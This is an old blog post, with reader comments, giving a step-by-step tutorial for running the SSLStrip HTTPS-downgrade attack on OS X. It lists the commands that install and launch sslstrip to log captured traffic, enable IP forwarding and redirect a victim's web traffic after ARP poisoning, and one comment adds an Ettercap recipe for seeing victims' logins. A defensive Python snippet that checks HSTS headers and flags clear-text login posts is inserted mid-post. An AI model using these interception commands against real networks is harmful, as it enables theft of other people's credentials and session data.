Thursday, January 6, 2011

SSL stripping on OS X with SSLStrip

The SSLStrip tool provides a demonstration of HTTPS stripping attacks; you can download it from here.

Then, on OS X 10.6.5 with MacPorts, we need to install the following dependencies.

1. $ sudo port selfupdate

2. $ sudo port install py25-twisted-web2

3. $ sudo port install py25-socket-ssl

4. $ sudo port install py25-openssl

Now, run the following from the SSLStrip home directory.

$ sudo python sslstrip.py -l 9090 -w captured.log

This starts SSLStrip listening on port 9090 and writes all captured traffic into captured.log.

Now the interesting part starts. We need to make the traffic from our target machine go through SSLStrip. To do that, we first need to make sure the traffic flows through our machine, which we do by ARP poisoning the target machine; my previous blog post explains how. Once that is done, we need to forward all of that incoming traffic to the port where SSLStrip is running.

Enable IP forwarding on the Mac.

$ sudo sysctl -w net.inet.ip.forwarding=1
$ sudo sysctl -w net.inet.ip.fw.verbose=1

Now we need to add a rule to IPFW to redirect traffic to the port where SSLStrip is running.

$ sudo ipfw add fwd 127.0.0.1,9090 log tcp from not me to any 80
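As the defender's counterpart to the redirection set up above, here is an added example (my own code, not from this post or the SSLStrip project): it parses a Strict-Transport-Security header, which is the standard mitigation for this downgrade, and flags clear-text login POSTs in log lines. The log format is constructed for the example and assumes a sensor sitting on the victim's side of the path, where a stripped session is visible as plain HTTP.

```python
"""Defender-side checks for the HTTPS stripping shown above (added example, not
code from the post or the SSLStrip project): parse an HSTS header, the standard
mitigation, and flag clear-text login POSTs in constructed sensor log lines."""
import re

# Constructed log format for this example: "<scheme> <client> <method> <path> <status>".
LOG_RE = re.compile(r'^(?P<scheme>https?) (?P<ip>\S+) (?P<method>[A-Z]+) '
                    r'(?P<path>\S+) (?P<status>\d{3})$')
LOGIN_PATH = re.compile(r'/(login|signin|session|auth)\b', re.IGNORECASE)

SAMPLE_LOG = """\
https 10.0.0.7 GET /index.html 200
http 10.0.0.7 GET /index.html 200
http 10.0.0.7 POST /login 302
https 10.0.0.9 POST /login 302
http 10.0.0.7 POST /api/search 200
not a log line
"""

def parse_hsts(value):
    """Parse a Strict-Transport-Security value; None if absent or without a numeric max-age."""
    if not value:
        return None
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        if name:
            directives[name.strip().lower()] = val.strip().strip('"')
    max_age = directives.get("max-age", "")
    if not max_age.isdigit():
        return None
    return {"max_age": int(max_age),
            "include_subdomains": "includesubdomains" in directives,
            "preload": "preload" in directives}

def hsts_protects(value, min_age=15552000):
    """True if a policy exists with max-age >= min_age (180 days); max-age=0 clears it."""
    policy = parse_hsts(value)
    return policy is not None and policy["max_age"] >= min_age

def flag_stripped_logins(log_text):
    """Return (client, path) for login POSTs that travelled as plain HTTP."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if (m and m["scheme"] == "http" and m["method"] == "POST"
                and LOGIN_PATH.search(m["path"])):
            hits.append((m["ip"], m["path"]))
    return hits
```

A sensor upstream of the proxy would only see the proxy's own HTTPS leg, so the log check is only meaningful on the client side of the path; the HSTS check is what removes the downgrade window in the first place.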

5 comments:

Phenomeno said...

Hi!

The port "py26-socket-ssl" doesn't exist, only "py25-socket-ssl". Did you install it? Or which ports should I install to get sslstrip working?

py26-twisted-web2 or py25-twisted-web2

py26-openssl or py25-openssl

Thanks

Prabath said...

Thanks.. done the correction - it's in fact py25...

KB said...

I'm currently trying to get sslstrip going on an iPod Touch or iPhone. Any tips/suggestions? If I figure it out, I'll post back.

-Kevin

Robert said...

Hi, I'm using this but with Ettercap-ng because I want to see the LOGINS right away instead, and I just feel it is much simpler and feels more right.

Here are the commands I use in Mac OS X "latest":

sudo sysctl -w net.inet.ip.forwarding=1
sudo sysctl -w net.inet.ip.fw.verbose=1
sudo sysctl -w net.inet.ip.scopedroute=0

sudo sslstrip -l 8080
sudo ipfw add fwd 127.0.0.1,8080 log tcp from not me to any 80

sudo ettercap -C <-- Terminal UI Based, Scan for Hosts, Host File: Add target 1 and 2 gateway.. MITM: remote -> Then start sniffing.

And Facile!
You have forgotten to tell people to:
sudo sysctl -w net.inet.ip.scopedroute=0 <-- that's really important.

Thanks for the great tutorial btw.
